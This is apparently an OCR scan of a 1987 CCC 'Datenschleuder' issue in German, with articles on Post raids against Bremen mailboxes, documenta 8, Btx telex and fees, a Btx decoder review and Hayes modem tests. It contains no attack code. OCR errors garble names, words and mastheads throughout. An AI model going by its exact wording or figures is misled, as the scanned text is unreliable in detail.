an posteigene TEMEX-Neizabschlüsse wrderruiltch zugeiassen.
Oie^ Kontaide könrten auch in beiiecigen pnvaten Geräten in Form
emes'Kontaktes eines elektromagnetischen Relais realisiert sein,
das die erforderliche galvanische Trennung zwischen Spulenslrom-
kreis und Relaiskontakt nach DIN 27804A/0E 0304, Abschnitt
12.2b. gewährleistet {elektromagnetische Relais, die von Stark*
Stromkreisen erregt werden und Femmefdekreise schalten).
SatcnSrijlciibcr
Alles retour
Datex-PZOF ab August w/ieder preiswerter
Nun ist es amtlich: Wie das BPM mitteilt, wird zum
!. August wieder der alte Leistungsumfang beim
Zugang zu Datex-P20F und zur Telebox angeboten.
Die Post gibt als Grund technische Schwierigkeiten
mit der neuen Netzstuktur an. Verkennen tun die
Herren in Bonn und Dormstadt immer noch, daß der
zum April geänderte Zugang und die damit ver¬
bundene Kostenstruktur eigentlicher Auslöser für
den Rückgang der Nutzungszeiten in diesem Dienst
sind. Der jetzt wieder preiswerte Zugang ist jedoch
nur eine vorübergehende Erscheinung. Sobald die
Post ihre Technik im Griff hat, wird alles wieder
geändert und damit auch teurer. Bleibt zu wünschen,
daß die Herren niemals fertig werden.
LS23
Seite 5
Katz und Aus
Post klemmt Mailboxen ab.
Bremen (CRD): Am Donnerstag, den 16. Juli
legte die Bremer Post in einer konzertierten Ak¬
tion fünf Bremer Mailboxsysteme lahm. Unter
Berufung auf Gefahr im Verzug startete die Post,
unterstützt durch Kriminalbeamte, der Bremer
Polizei bei den betreffenden Mailboxbetreibern
gleichzeitig um 21 Uhr die Hausdurchsuchungen.
Ermittelt wurde wegen des Verdachts auf Ver¬
stoß gegen das Fernmeldeanlagengesetz. Wie die
Pressestelle der Oberpostdirektion (OPD) Bre¬
men mitteilt, wurden bei den Hausdurchsu¬
chungen “mechanische Zusatzeinrichtungen“
(auch bekannt als KATZE) sichergestellt.
Wie der CCC ermittelte, wurden auch nichtgeprüfte
MODEMS und angeschlossene Telefone sicherge¬
stellt. Weiterhin stellte die PostGerätesicher.diemit
wenigen Handgriffen (Modem-Kabel neben der
Postdose liegend) anschließbar gewesen wären.
Über sichergestellte Computer und deren (bei Mail-
boxsystemen vertrauliche) Daten bestände ist nichts
Wie schon in anderen Städten setzt die Post verstärkt
die Aufdeckung “illegal“ installiener Modems und
Katzen, besonders an Mailboxsystemen fon. Auch
aus Köln wurden in der Vergangenheit derartige
Aktionen gemeldet. Das gezielte Vorgehen gegen
nahezu alle Betreiber im Bereich einer Oberpostdi¬
rektion ist jedoch neu.
Wie nähere Recherchen jetzt ergaben, geht die Ak¬
tion der Post ursprünglich auf eine Gebührenbe¬
schwerde eines Fernsprechteilnehmers zurück. Die¬
ser wunderte sich über seine sehr hohe Telefon¬
rechnung und beantragte eine Zählervergleichsein¬
richtung. Beim Vergleich der protokollierten Ruf¬
nummern wurden die unzulässigen Ankopplungen
festgestellt, die übrigens mehrfach am Tag ange-
wählt wurden. Nun gab es etwas trouble in der
Familie, denn als Vemrsacher kam nur noch der
computerbegeisterte Sohn in Frage (der im übrigen
bis zum Versandlag der Fernmelderechnung selber
eine Mailbox betrieben hatte).
lSntcnSd)lcubet
Ähnlich “dumme“ Geschichten von “Denunzian¬
tentum“ konkurrierender Mailboxsysteme wurden
auch schon aus Köln gemeldet. Dort haben Mailbox-
Betreiber sich gegenseitig die Post ins Haus ge¬
schickt - frei nach dem Motto “Meine Box ist post¬
geprüft, also weg mit der Konkurrenz!“. B ishermuß-
te das Fernmeldeanlagengesetz schon mehrfach für
hintergründige Zensur herhalten. Firmen, die z.B.
Raubkopierer jagen, ließen auf diesem Wege un¬
liebsame Veröffentlichungen aus dem Netz entfer¬
nen, Die Post (leider oft zu blind, um zu verstehen,
wie sie mißbraucht wird) macht dabei gerne mit.
Seit langem warten Mailboxbetreiber und Compu¬
teranwender auf die Freigabe preiswerter privater
Modems. Die Post, die nach einem EG-Urteil zur
Zulassung privater Modems verpflichtet ist, sperrt
sich immer noch unter Berufung auf noch nicht
vorhandene und abgestimmte Zulassungsbedin¬
gungen. Die von der Post angebotenen Modems
dürfen vielfach nicht an den preiswerten Heim-
computem betrieben werden und sind von den hohen
Gebühren her für viele Anwender nicht finanzierbar.
Bisher wurden vielfach “mechanische Zusatzein¬
richtungen“ zum Abheben der Telefone geduldet.
Bei dieser Form der Ankopplung liegt äer Tele¬
fonhörer permanent in einem (geprüftem) Akustik¬
koppler, während eine Hilfsmechanik den Abhebe¬
vorgang steuert. Das Vorgehen gegen diese in der
Fernmeldeordnung nicht berücksichtigten Ankop¬
plungen nimmt vielen Mailboxbetreibern die letzte
Möglichkeit, ihr Informationssystem innerhalb ihres
Taschengeldbudgets zu betreiben. Der Chaos Com¬
puter Club verurteilt das Vorgehen der Deutschen
Bundespost auf das Schärfste. Eine Duldung me¬
chanischer Ankopplungen liegt durchaus im Rah¬
men der Gesetzgebung. Dieses zu Beurteilen ob-
gliegt der Post, welche ohne weiteres in der Lage
wäre, durch eine entsprechende Anweisung die Si¬
tuation auch zugunsten der engagierten Compute¬
ranwender zu entschärfen.
Zu hoffen ist, daß nach einer Zulassung von privaten
Daten-Modems Drahtseilaktemit technischen Hilfs¬
mitteln nicht mehr nötig sind und Mailboxsysteme,
wie weltweit üblich, ohne großen Kostenaufwand
am Fernsprechnetz betrieben werden dürfen.
Seite 6
Mailboxbetreiber, die ihre Systeme nicht den Vor¬
schriften entsprechend betreiben, sollten sich einst¬
weilen nicht zu sicher fühlen. Bei einer Haus¬
durchsuchung bleibt oft kaum Zeit, die Geräte vom
Netz zu trennen. Der Tatbestand, mit wenigen Hand¬
griffen anschließbar zu sein, reicht für die Sicher¬
stellung (und als Rechtfertigung für eine Durchsu¬
chung) aus. Solange die Post als Handlanger im
Interesse Dritter handelt und selber zu einfältig ist,
dies zu durchschauen, genügt wie in Bremen ein
Zufall, um sich handfesten Ärger einzuhandeln.
LS23
Die Knust und ihre Knüstler
CCC-Visite auf der Dokumenta 8
Eines schönen Tages klingelt bei Peter das Tele¬
fon. Dran ist Karel Dtidesek (alias Dudelsack)
von Minus Deila T (-D(). Über bestehende Ver¬
bindungen zwischen -Dt und CCC siehe auch
HACKERBIBEL Seite 32/33.
-DT möchte, “daß der CCC auf der Dokumenta
präsent ist“, um dem computerignoranten Ambiente
ein wenig entgegenzuwirken. Der CCC mochte
auch. Am Dienstag den 14.7.1987 war der histori¬
sche Tag, an dem die CCC-Abordnung hinterm
Mond landete, auf dem Felde der Computerigno¬
ranten.
Auf zum Public Relations Zentrum. Widerstandslos
wurden uns Pressekarten ausgehändigt; offenbar
halte man hier noch nie vom schreckenerregenden
CCC gehört. Dazu gab’s die Diätversion einer Pres¬
semappe; verwöhnt von der Cebit und anderen Mi-
croMessen hatten wir damit gerechnet, einen Aus¬
stellungskatalog in die Hand gedrückt zu bekom¬
men, anhand dessen man sich seinen Weg durch
diverse Häuser, Räume und Plätze erlaufen könnte.
Nix. Mehr als allgemeines Blabla gabs nicht;
“Eine Medienkunst, die sich nicht mehr, wie zum
Beispiel Video oder Performance in den 70er Jahren,
privatistisch zurückzieht, sondern auf großen Wän¬
den. in der 'Vermischung mit Unterhaltungsele¬
menten öffentlicht macht. Einer Kunst, die das kul¬
turelle und soziale Umfeld ernst nimmt und sich ihm
stellt, die mit bildnerischen Argumenten kommen¬
tiert, appelliert, interveniert.“ Oder: “Der Weg in die
Gesellschaft erfolgt nicht nur über Ikonografie und
Thematik, sondern auch über die Anknüpfung an
Benutzbarkeit und Funktion.“
Ich stellte fest, daß an allen Kuntwerken, an denen es
etwas zu daddeln gab oder auf die man sich setzten
konnte, entweder “Bitte nicht berühren“ stand oder
ein Absperrseil dasBesteigen (Erstbesteigungeines
Kunstwerks ohne Sauerstoffgerät) verwehrte.
Ich will nicht behaupten, ich hätte alles gesehen, was
die Dokumenta bietet. Das, was ich gesehen habe,
hat mir nicht gefallen. Kaum ein Kunstwerk hat mich
mehr als ein paar Sekunden fesseln können. Nur drei
habe ich ansprechend gefunden: Den ausgestellten
GRID Computer (Designer-Kunstwerk), einen auf
eine Drehscheibe gestellten Mercedes 300 CE, und
den “erweiterten Schwitters“, eine automatische
Holzstockfigur, die mit Druckluft funktioniert.
Das hat weder mit einem Hang zum Teuren noch zur
Technik zu tun - etliche der anderen Ausstelluns-
stücke sind bestimmt teurer als die genannten -
sondern mit deren klarem Design. Weswegen sie
auch in der Designausstellung (in der Orangerie)
stehen. Beachtenswert fand ich auch, daß es eine
Video- und Audiothek gibt. Videothek mit zwei
kleinen Kabinen, in denen man selbst ausgewählte
Videos an sehen kann, und einem Großbildprojcktor,
auf dem ein ständiges Programm läuft. In der Au¬
diothek kann man sich seine KunstOhrwürmer in
einer Art Raumfahrersessel anhören kann.
Ich war um eine gegen Hinterlegung eines noch-
nichtfälschugssicheren Persos geborgte Video 8 Ca¬
mera reicher. Sony sponsert die Dokumenta mit
etlichen TV-Monitoren und dem kostenlosen Han-
dycamverleih, eine gute Idee, Nur die Videocasselte
muß man mit 10DM bezahlen, falls sieeinem gefällt.
Ich wanderte zu dem Gelenkbus von Minus Delta T.
Weiss, etwa zwweiundzwanzig Meter lang, in der
Mitte mit Plastikknautschzone, so 120 Qubikmeter
umbauter Raum. Drin zwei Computer, zwei Dmc-
ker, drei Monitore, zwei Synthesizer, mehrere Ta¬
pes, drei TV-Monitore (auf dem einen lief ständig
irgendein Sateliten-Programm), einige Sitzgele¬
genheiten, ein Büchergrabbeltisch etc. An der Spitze
des Busses, neben der Gefriertruhe mit Getränken,
eine gigantische Satelliten-Empfangsschüssel. An
der Querseite zwei große Lautsprecher, obendrauf je
ein Monitor aus dem Bus und ein Glashaus, in dem
die-Radiosendungen produziert werden. Das ganze
steht auf dem Platz neben dem Staatstheater, auf dem
Weg vom Fridericianum, wo die Hauptausstellung
ist, zur Orangerie.
©nlcnSdjIcubcr
Seite 7
Als Wau eintraf, produzienen wir auf einer nahen
Wiese im Halbschatten (Tonqualität entsprechend)
ein Interview, das als Werbetext für unseren abend¬
lichen Vonrag (“DerCCC, das Leben und das Uni¬
versum“) über Radio gesendet werden sollte. Schon
beim zweiten Anlauf wurde was draus. Während der
Abend immer näher rückte und wir an Erholung
dachten (keine Kunst mehr), kamen die ersten In¬
teressenten, um uns auszuquetschen, sodaß wir zu
spät zum New York, dem Vortragsort, aufbrachen.
Erzählt haben wir über den CCC: was wir sind,
machen, arbeiten, aufregend finden, in welche Rich¬
tung nach unserer Meinung die Technologie treibt
(nach vorne, hinten, oben, unten, links und rechts).
Und, wichtigstes Thema: was wir über die Doku-
menta & die computerlosen Künstler denken. Und
was denken wir? Sowohl Wau als auch ich stellten
fest, daß sich außer -Dt und Winfried Scheuer, der
denGRID gestaltete, anscheinend kein Künstler mit
der Mikroelektronik auseinandergesetzt hat. Wau
meinte, es liegt an der Technikfeindlichkeit oder
-ängstlichkeit dieser Leute (“Out Of Marmor Er¬
ror“). Sie sind anscheinend nicht in der Lage, derlei
Feindlich- oder Ängstlichkeit innerhalb ihres Zeit¬
gefühls auszudrücken.
Es gab keine Künstler (Ausnahme -Dt, negative
Ausnahme: langweilige, gigantomaische Video¬
kunst), die neue Technik einsetzten, um zumindest
versuchsweise oder in Gestalt eines vielfältigen und
benutzbaren Environments (wie der -Dt-Bus “Für
ein neues Leben“) daraus oder damit Kunst zu ma¬
chen, indem sie an dem beschaulichen, herkömm¬
lichen Kunstbegiiff kratzen. Unserer Meinung nach
ist dies ein Fehler. Ein bedeutender Teil der gegen-
wänigen Kultur wird schlichtweg nicht berück¬
sichtigt, sondern verdrängt. Man kann nur hoffen,
daß in fünf Jahren, auf der nächsten Dokuments,
Werke zu sehen sein werden, die sich mit diesem
Thema beschäftigen.
PX-8la:doku.txtLSni VI 870720/21
CUNCHIDS-REDIGOBUNI21.07.87/16:19/9139
Computer und Kirche
Luthers Bibel auf Diskette gespeichert
München (sz) - Die Luther-Bibel auf Diskette ist
eines der “Großprojekte“ der “Christiiehen In¬
teressengemeinschaft für Computeranwendung“
(CHRIC)
SflfcnSi^rcMhcr
Seitdem der evangelische Pfarrer
Werner Küstenmacher, der hauptberuflich die
Abteilung “Neue Medien“ In der Evangelischen
Landeskirche betreut, im Jahre 1984 die “Selbs¬
thilfeorganisation“ für computerbegeisterte
Pfarrer gründete, erreichen ihn fast täglich Zu¬
schriften und Anrufe von ratsuchenden Theolo¬
gen und kirchlichen Mitarbeitern.
“Der Computer im Pfarramt erfreut sich einer stei¬
genden Nachfrage“, stellt Küstenmacher, selbst ein
leidenschaftlicher Computerfan, zufrieden fest. Be¬
reits zehn von 60 evangelischen Pfarrern in Mün¬
chen arbeiten mit elektronischer Textveraibeitung.
In einem Pilotprojekt, das die Landeskirche in vier
Münchner Kirchengemeinden durchführt, wird jetzt
eigens erprobt, was die PC-Computer an Arbeits¬
erleichterung im Alltag der Pfarrämter bringen kön¬
nen. Pfarrer Markus Weidemann von der Naza-
rethgemcindc ist nach anfänglicher Skepsis zum
überzeugten Computer-Anhänger geworden:
“Nachdem wir genügend Software hauen, standen
unsere Mitarbeiter Schlange vor dem BildBchinn“.
Das von Werner KUstenmacher herausgegebene In¬
formationsheft "CHRIC-Brief, das im evangeli¬
schen Pressedienst erscheint, unterrichtet regelmä¬
ßig mit vielen Tips und Tricks über den neuesten
Stand der Computer-Technik. Vorgestellt werden
zum Beispiel Systemprogramme, die jetzt schon
spezielle theologische Bedürfnisse bedienen. Lie¬
blingsthema der neuesten Ausgabe: Hebräisch und
Griechisch aus dem Computer. Es sei kein Wunder,
das CHRIC ausgerechnet in München entstanden
sei, meint Küslenmacher, “München ist ein kleines
Silicon Valley, da kommen wir immer an neueste
Informationen ran.“
Wenn der CHRIC-Mitgliederstamm von derzeit et¬
wa 500 Interessenten weiter zunimmt, wird bald
eintreten, was sich Pfarrer Küstenmacher von seiner
Initiative erhoffte: Ein Netzwerk von christlichen
Computerbesitzem, die ihre Erfahrungen mit dem
neuen Medium Computer austauschen. Ethische Be¬
denken gegen die Einführung der elektronischen
Datenverarbeitung hat der Computerpfarrer nicht:
“Solange der PC Hilfsmittel des Menschen bleibt,
sehe ich keinen Grund zum Warnen“.
9Ä. . ÜOOI
Andreas Beuthner
(Süddeutsche Zeitung, 21.4.1987)
Seite 8
Mit der Post ins Telex-Chaos
Telex über BTX
Telex über Bildschirmtexl - Damit wirbt die Bun¬
despost jetzt verstärkt für neue Btx-Teilnehmer.
Der von der Post für ein Jahr angelegte Be¬
triebsversuch wurde im Mai ’87 begonnen. Btx-
Teilnehmer können versuchen, über einen ex¬
ternen Rechner der Bundepost Telexe ins In- und
Ausland zu versenden und auch von dort zu
erhalten.
Rund 600 Telexe werden zur Zeit täglich von der
Post vermittelt. Der CCC stellte umgehend nach
Betriebsbeginn die automatische Erstellung und
Versendung von Gebührenbeschwerden auf den
Btx-Telex-Dienst um. Vorher wurde dies übereinen
Telexserver derGEONET- Mailboxsystemcin Eng¬
land abgewickelt.
Da ein Telex als juristisches Dokument anerkannt
wird, istZuverlässigkeit bei der Abwicklung solcher
Server-Dienstleistungen ein wesentliches Krite¬
rium. Dieses kann bei dem Postangebot jedoch noch
nicht erwartet werden.
So gab die Redaktion am 11.05. gegen 14:41 ein
Telex auf. Die Post quittiert die Eingabe mit der
Ankündigung, daß in wenigen Minuten eine
Versand- oder Fehlerbestätigung als Milteilung
übersandt werde. Dies geschah jedoch erst über 17
Stunden (!) später. Wie zeit- und gebUhrenaufwen-
dige Recherchen ergaben, konnten aufgrund einer
Störung im Datex-P Netz weder Absendebestäti-
gungen für ordnungsgemäß zugestellte Telexe, noch
Fehlermeldungen für nicht zugestellte Telexe an die
Btx- Teilnehmer quittiert werden. Wesentlich
schwerwiegender dürfte sich auswirken, daß durch
denselben Fehler auch keine Mitteilungen über den
Erhalt von Telexen versandt werden konnten. Das
bedeutet, daß dasTelex gegenüber dem Absender als
juristisch anerkannt zugesiellt gilt, obwohl der be¬
treffende Btx-Tcilnehmer keinen Hinweis auf den
Telexeingang erhält. Nach Auskunft der zuständi¬
gen Dienststelle können weitere Ausfälle für die
Zukunft nicht ausgeschlossen werden.
Welche Folgen dadurch womöglich bei Terminge¬
schäften ausgelöst werden, kann sich jeder An¬
wender selber ausrechnen.
Da fragt man sich, warum denn bei so einem “wac¬
keligen“ Betriebsversuch schon die vollen Gebüh¬
ren verlangt werden. Die Antwort ist einfach; die
Seite 9
Post nimmt lieber von Anfang volle Gebühren als
sich später bei Einführung des Regeldienstes mit den
Teilnehmern herumzuschlagen. Desweiteren muß
der Dienst erst durch die Ferameldeordnung aner¬
kannt werden. Im Klartext: Wer als erster neue
Dienste nutzt, zahlt auch das Lehrgeld für die Bun¬
despost und befindet sich juristisch auf sehr glatten
Boden.
LS23
CLINCH/DS-RED/S.WERNERY/
17.05.87120:4512464 Znirhn
Btx-Nepp
Löschen ist gebührenpflichtig!
Am heutigen Tage erhielt der CCC nach langen
Bemühungen eines der begehrten Exemplare der
Fernmeldeordnung (FO). Vielfach ist diese nicht
mehr zu beziehen, da sie im Januar 88 durch die
Telekommunikationsordnung (TKO) ersetzt
wird.
Bei genauem Studium der in der FO angegebenen
Gebührenposten für Bildschirmtext wird erstmals
eindeutig klar, daß auch das Löschen von Btx-Seiten
durch den Anbieter gebührenpflichtig ist. Ange¬
rechnet wird widersinnigerweise die Gebühr für das
Einarbeiten (!) von Btx-Seiten.
Das Anbieterhandbuch en thält zu den B tx-Gebühren
nureinen Hinweis auf die im Btx-Systemabrufbaren
Übersichten. Dort im System sind im Informa¬
tionsteil (*104„ff) für Anbieter nur die Einarbei¬
tungsgebühren pauschal aufgeführt, wogegen in der
GebührenUbersicht im Post-Programm (*20000„ff)
auf das gebührenpflichtige Löschen versteckt hin¬
gewiesen wird. Die der Redaktion vorliegenden of¬
fiziellen Gebührenübersichten der Bundespost ent¬
halten keinen Hinweis auf die Kosten für das Lö¬
schen von Seiten. Lediglich derim Juni vergangenen
Jahres an die Anbieter versandte Umstellungsplan
enthält im Anhang einen entsprechenden Hinweis.
Hier zeigt sich mal wieder, mit welch verworrenen
(sich teilweise widersprechenden) Informationen
die Btx-Anbieter über die tatsächlichen Gebühren¬
posten genarrt werden.
Berechnet werden für das direkte Löschen von Sei¬
ten oder Blättern je Seite DM 0,10, wogegen das
Löschen kompletter Seiten (a-z) sowie das Löschen
ab Seite (laut Auskunft der Btx-NV) mitDM 0,05 je
Seiie/BIatt berechnet wird.
SinicnMjlcubcr
Die Erhebung von Gebühren für das Löschen von
Btx-Seiten grenzt nahezu an Betrug. Hinzu kommt,
daß die Post es bisher nicht für nötig hielt, in ihren
Gebührenübersichten (auch dem Anbieterhand¬
buch) auf diesen Umstand hinzuweisen. Denken Sie
also daran, wenn ihnen die Umgangsformen der Post
zum Hals raushängen und ihnen die Lust an der
Teilnahme am Btx-Dienst vergangen ist, überlassen
Sie das Löschen Ihres Angebotes der Post; das ist
preiswerter!
Bildschirmtext,
jetzt mit *CHAOS»
Zum 25J26. Juli ’87 änderte die Post die Sy¬
stemsoftware des Bildschirmtext Rechnerkübels.
Neue Systemmerkmale bringen mehr komfort.
Enischeident dürfte das neue Leistungsmerkmal
der 'Alphanumerischen Suche’ sein.
Bix-Red - LS23
pmni
Die Hacker Charts (II)
1 Zero Leander
KANN DENN HACKEN SÜNDE SEIN
2 Freddy Quit
EIN SHIFT WIRD KOMMEN
3 Kraftwerk
DAS MODEM
So ist es mit *Anbietemame„ (Z.B. *CHAOS„)
möglich einen Suchauftrag im Anbieterverzeichnis
zu starten. Folgend wird, bei mehreren Angeboten
(z.B. *Club„) eine Liste ausgegeben, bei nur einem
Anbieter (wer hat sonst noch CHAOS im Namen)
das Programm direkt aufgerufen.
Die Btx-Redaktion des CCC läßt dementsprechend
neue Suchbegriffe in das Anbieterverzeichnis cin-
tragen (fernmündlich genehmigt). Neben der Suche
nach Abkürzungen wie “CCC BHP CAC IPN bka“
erscheint die Übersicht des CCC auch bei dem Such¬
begriff HILFE. Nach langen Mühen mit den zu¬
ständigen Verwaltungsstellen der Post gelang sogar
der Eintrag POST. Schon im Schlagwortverzeichnis
war der CCC unter dem Begriff POST zu finden.
Auch zukünftig erscheint der Name des Clubs neben
denen der Postdienststellen. Ein sichtbares Zeichen
der Ausgewogenheit im Bildschirmtextsystem.
LS23
4 Nena
99 TELEFONS
5 Marianne Rosenberg
NUI DU ALLEIN
6 Heintjc
SYSOP SO LEB
7 Manuela
SCHULD WAR NUR DER DATENTRÄGER
8 Datennetz-Kontrollchor
der Deutschen Bundespost
HOCH AUF DEM GELBEN HÖRNCHEN
9 Geier Absturz
DIE INTERDATIONALE
art wo?
Und wo bitteschön ist die Kunst? Eben nicht auf der
Dokumenta, und eben auch nicht in den vielgc-
rühmtcn 120 weissen qm Bus von -Dt. Schade.
Ärgerlich aber: Was treibt den CCC in die Niede¬
rungen der Kasperltheater-Wirklichkeit einer Do¬
kumenta? DE Wirklichkeit braucht -Dt, um ihre
Kunst als “Nase im Wind" und “Zukunflstechno-
logie“ erscheinen zu lassen; aber was macht ein
echtes Hackerteam in IHR?
Darüber demnächst mehr, was ich an dieser Stelle
auch nur angekündigt haben wollte, und verab¬
schiede mich für heute, nach China.
A Peter Alexander
HIER CRACKT EIN MENSCH
Marina Kern
LS blofeld
SatcnSd/lciibcr
Ä Marina bringt uns ein chinesisches Telefonbuch
aus Peking mit; Anm.d.Red Ü
Seite 10
Stiftung Datentest
Softwaredecoder fuer PCs
Die Datenschleuder hat es schon vor Jahren pro¬
phezeit; mittlerweile gibtes eine ganze Reihe von
Anbietern, die Softwarelösungen für
Bildschirmtext-Anwendungen vorweisen kön¬
nen. Eines dieser Produkte nennt sich BTX-Term
PC und wird von der Firma Stockem Compu¬
tertechnik, Lange Wende 33, in 4770 Soest, an-
geboten.
Für deutlich unter 300 DM erhält man einen DIN
A5-Ringordner mit der Anleitung und zwei Dis¬
ketten mit Installations- und Treiberroutinen, sowie
dem eigentlichen Softwaredecoder. Außerdem wird
ein spezielles, umschallbares Serialkabel mitgelie¬
fert, das bei 50 % der Käufer Anlaß zur Erheiterung
geben dürfte. Dazu später mehr.
Es ist gewiß keine leichte Aufgabe, einen Softwa¬
redecoder für Bildschirmtexl zu entwickeln. Dafür
sorgt schon der merkwürdige Pseudostandard, den
sich die Post für die langsame Übertragung bunter
Bildchen hat einfallen lassen. Entsprechend schwer
haben sich die Porgrammierer lange Zeit getan. Das
Unterfangen wird noch dadurch erschwert, daß es
zwar einen Industriestandard für Personalcomputer
gibt, dieseraber spätestens dann peinlich wird, wenn
eben die bunten BTX-Bildchen dargestellt werden
sollen.
Stockem hat, nach anfänglichen Schwierigkeiten,
den Großteil dieser lYobleme geläst. BTX-Term PC
unterstützt alle gängigen Grafikkarten und holt her¬
aus, was herauszuholen ist. Unser Testrechner war
ein Billigst-PC, made in Eile, mit Hercules-Grafik
und V20-Chip. Dadurch waren die Probleme vor¬
programmiert. Um den Test noch weiter zu er¬
schweren, wurde ein Postmodem D 1200S-06 be¬
nutzt, da damit die größten Schwierigkeiten im prak¬
tischen Betrieb garantiert sind. Alternativ wurde ein
Datenfohn S21/23D bereitgehalten, da klar war, daß
es mit einem Postmodem so einfach nicht gehen
würde.
Wie unschwerzu ahnen ist, haben wir schlußendlich
auch letzteren benutzt. Es kam uns zunächst darauf
an, zu erfahren, wie die Software mit BTX umgeht
und was man für Vorteile hat, wenn man sie statt
eines TV-Decoders einsetzt. Beim Testrechner war
Farbe nicht drin, umsomehr galt das Augenmerk der
Seite 11
Ersatzdarstellung auf dem HerculesScreen, der im¬
merhin die BTX-Auflösung locker schafft. Der
Stockem-Decoder bewältigt die Aufgabe ganz gut,
bis auf ein gelegentliches unmotivicncs Setzen des
Invers-Attributs. Der Verdacht, daß dies sogar be¬
absichtigt ist, drängt sich angesichts der'Regelmä-
ßigkeit des Fehlers auf, ein Sinn kann jedoch nicht
gefunden werden. Da es den meisten Anwendern
weniger auf die Grafik, als auf einen sauberen Text¬
aufbau ankommen dürfte, kann man dieses Manko
getrost vergessen.
Als Ausgleich bietet das Programm die Möglichkeit,
die dargestellten Seiten sowohl als reine ASCII-
Datei, als auch als Grafik abzuspeichern und aus¬
zudrucken. Umgekehrt kann man beliebige extern
erstellte Texte an das BTX-System senden, der
Nachrichtenaustausch wird also auf Techniken er¬
weitert, die man von anderen Medien wie Mailboxen
schon kennt und schätzt. Daruberhinaus bietet das
Programm die Möglichkeit, in einem ’Learn’- Mo¬
dus festgelegte Befehlsfolgen abzumfen. Man kann
so z.B. den Ausdruck seines Kontoslandes auto¬
matisieren, wenn man BTX-Kontenführung macht.
Darüberhinaus gibt es noch einigen Schnick¬
schnack, der weniger interessant ist, vielleicht mit
Ausnahme der Möglichkeit, resident ins DOS zu
gehen, ohne daß derBTX-Dialog abgebrochen wird.
Leider funktioniert das ganze nicht so weit, daß man
im DOS einen Text editieren und gleichzeitig den
Kontostand abfragen kann, aber solche Probleme
löst man ohnehin besser mit entsprechenden Be¬
triebssystemen.
Den größten Minuspunkt erhält das Programm für
den Kopierschutz, der einfach nicht mehr zeitgemäß
ist. Dieser verbirgt sich als Hardwarezusatz in der
unvollständig konfigurierten und viel zu kurzen Se¬
rialleitung, die mitgeliefert wird. Das mutet eher
rührend an, denn welche Möglichkeiten gibt es
schon, ohne Beeinträchtigung der Funktion am Se¬
rialport zu manipulieren, wenn man ohnehin schon
einiges verbiegen muss, um die 1200/75 Baud zu
realisieren, und nur eine beschränkte Zahl von Ein-
Ausgabeleitungen hat.
goblin
btxier22.ds 19870630 2200
PS: Ein Hinweis nach Redaktionsschluß; Commo-
dore will zur EA 10.000 BTX-Sleckmodule (In¬
nenleben von Siemens) für unter 400 DM anbieten.
Das sagte Commodore allerdings auch schon auf der
letzten EA.
Sxitcncidtlnbcr
To DFÜ or not to DFÜ
Von einem der auszog ein Hayes-Modem zu
kaufen.
Unser Normaluser M. Umpitz (Name von der
Redaktion geändert) begab sich also auf die Su¬
che nach einem schnelleren Modem, um die Ko¬
sten pro ausgelesenem Byte zu senken. Daß der
Computer dieses Herrn keine FZZ-Nr. hat und
daher die Post dort keines ihrer 1200BpS-
Modems anschließt, brachte den Herrn auf die
Idee, sich ein Hayes-kompaktibles Modem zu¬
zulegen.
Um das Ende der Geschichte gleich vorweg zu neh¬
men: Keines der getesteten Modems war ohne Mac¬
ken. Nicht ein einziges hat sich komplett an diesen
sogenannten Hayes-Standart gehalten.
Erklärung für Neulinge:
Ein Hayes-Modem wird normalerweise direkt an die
RS232-Schnittstelle angeschlossen. Es gibt auch
PC-Karten, die die RS232 mit ersetzen. Alle Ko-
mandos bis auf eines fangen mit einem großge¬
schriebenen “AT“ an. Sie starten also ihr Termi¬
nalprogramm, stellen es auf die gewünschte Bau¬
drate ein, und können nun ihre Komandos eingeben.
(Einige Modems haben auf der Platine ein paar
Schalter, die müssen vorher noch eingestellt wer¬
den). Man unterscheidet den Komando-Modus, in
dem Befehle eingegeben werden können und den
Online-Modus, wärenddas Modem die Verbindung
jnit einem anderen hat. Die Hayes-Modems haben
den Vorteil, daß das Eingeben der Komandos über
Schnittstelle geschieht. Man braucht also nicht ge¬
zielt irgendwelche Pin’s an der Schnittstelle zu set¬
zen, um auch gezielt wählen zu können.
Modem: WD-1600c
Generalvertrieb: PIM Computer AG, Schweiz
Wertung: Vom Kauf abzuraten
Besonderheiten: Telephonhörer wird mitgeliefert
Begründung: Alles scheitert am Terminal-Escape-
Character. Bei einem normalen Hayes-Modem muß
erst eine gewisse Zeit gewartet werden, dann gibt
man ihm dreimal ein “wartet wieder“ und ist im
Komandomodus (ohne aufgelegt zu haben). Dieses
Modem hat das nicht nötig. Sofort, wenn dieser
Character übertragen wird, legt es auf und ist im
Komandomodus. Wenn sie “ATS2=255“ sagen, um
die Übertragung transparent zu schalten, kann das
Ding nach dem Wählen den Carrier nicht mehr
erkennen. Binärdateien können also mit diesem Mo¬
dem nicht übertragen werden. Auch eine anständige
Carrier-Erkennung im Autoanswer-Modus bringt
das Dingnicht zustande. DerDTR-Pin, mit dem man
Sn/ciiäif^Icuhcr
das Modem noiiii;,..u.'x.zum Reset bringen kann,
wird komplett ignoriert u.s.w.
Modem: WELCOM
Generalvertrieb: Nicht auszumachen
Wertung: Unter Umständen brauchbar
Besonderheiten: Wenige DIP-Switshes
Begründung: Hängt sich manchmal aus unerklärli¬
chen Gründen mitten während der Übertragung auf.
Hängt sich auf, wenn während der Komandoeingabe
ein Anruf erkannt wird. Benutzt zur Baudratener¬
kennung bei einem Anruf einen 600 Carrier, auf den
manche Modems nicht antworten, und schickt auch
keinen 21 OOHz-Ton vorweg. Die ersten beiden Feh¬
ler sollen durch ein neues Eprom beseitigt seien
(Händler treten!). Was mit den anderen ist.
Modem: UGHTSPEED 1200
Generalvertrieb: M.PJ., Aachen
Wertung: Bestes Modem im Test
Besonderheiten: Scheisse Billig
Begründung: Bis jetzt nureine Macke bei dem neuen
Eprom, das derzeit ausgeliefert wird. Das Alte soll¬
ten sie wegwerfen (wiedermal kräftig den Händler
treten). Bei dem Neuen wird kein Carrier erkannt,
wenn man das Busy-Signal abfragt (“ATX3“) und
die Mailbox keinen 2100Hz-Ton sendet. Wenn man
das wegläßt: ganz prima. Wird bei Dauerbetrieb ein
wenig zu warm. Hat für Begriffsstutzige noch eine
Kurzanleitung, die das Modem an die Schnittstelle
überträgt (nette Spielerei). Sendet bei .‘knruferken-
nung zuerst einen 21 OOHz-Ton und schaltet dann
immer zwischen 300- und 1200-Baud Carrier um,
also ganz korrekt.
Modem: GVC 1200
Generalvertrieb: Resco, Augsburg
Wertung: Viel zu teuer für die Leistung die gebracht
wird
Besonderheiten: keine
Begründung: Schwierigkeiten mit der Anruferken¬
